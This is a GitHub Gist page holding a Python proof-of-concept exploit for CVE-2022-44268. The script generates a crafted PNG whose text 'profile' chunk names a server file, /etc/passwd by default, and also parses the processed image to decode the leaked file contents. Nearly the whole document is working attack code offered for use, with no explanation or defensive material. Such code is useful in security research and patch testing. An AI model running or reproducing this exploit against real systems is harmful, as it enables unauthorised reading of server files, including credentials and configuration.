Created
February 8, 2023 16:10
-
-
Save allyshka/77177cf717a92f88e04f1b8094617ed5 to your computer and use it in GitHub Desktop.
CVE-2022-44268 PNG generator and parser
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| import sys | |
| import struct | |
| import zlib | |
| import argparse | |
| parser = argparse.ArgumentParser() | |
| parser.add_argument("-s", "--size", type=int, default=256, help="size of an image in px (default: 256)") | |
| parser.add_argument("-f", "--file", type=str, default="/etc/passwd", help="local file to read (default: /etc/passwd)") | |
| parser.add_argument("-o", "--output", type=str, default="expl.png", help="output expoit image name (default: expl.png)") | |
| parser.add_argument("-i", "--input", type=str, help="an image name for parse, if specified then the script only parses the result") | |
| args = parser.parse_args() | |
| if args.input: | |
| obytes = '' | |
| length = 0 | |
| with open(args.input, "rb") as f: | |
| fdata = f.read() | |
| if b'zTXtRaw' in fdata: | |
| pos = fdata.find(b'zTXtRaw') | |
| size = struct.unpack(">I", fdata[pos-4:pos]) | |
| p_start = 22 | |
| profile_bytes = fdata[pos:pos+size[0]+p_start-4] | |
| try: | |
| obytes = zlib.decompress(profile_bytes[p_start:]) | |
| ohex = b''.join(obytes.split()[1:]) | |
| print(bytes.fromhex(ohex.decode()).decode()) | |
| except zlib.error as e: | |
| print(e) | |
| pass | |
| elif args.output and args.file: | |
| lfile = args.file | |
| oname = args.output | |
| isize = args.size | |
| sizeX = sizeY = struct.pack(">I", isize) | |
| header, ihdr = b'\x89PNG\r\n\x1a\n\x00\x00\x00\r', b'IHDR' + sizeX + sizeY + b'\x01\x00\x00\x00\x00' | |
| ihdrsize = struct.pack(">I", zlib.crc32(ihdr)) | |
| idat, payload = b'\x00\x00\x00\nIDATx\x9cch\x00\x00\x00\x82\x00\x81w\xcdr\xb6', b'tEXtprofile\x00' + lfile.encode() | |
| footer = b'\x00'*4 + b'IEND\xaeB`\x82' | |
| with open(oname, "wb") as f: | |
| f.write(header + ihdr + ihdrsize + idat + struct.pack(">I", len(payload)-4) + payload + struct.pack(">I", zlib.crc32(payload)) + footer) | |
| print(f"File {oname} is generated.") | |
| else: | |
| print("You must specify output or input file!") | |
| parser.print_help() | |
| sys.exit() |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment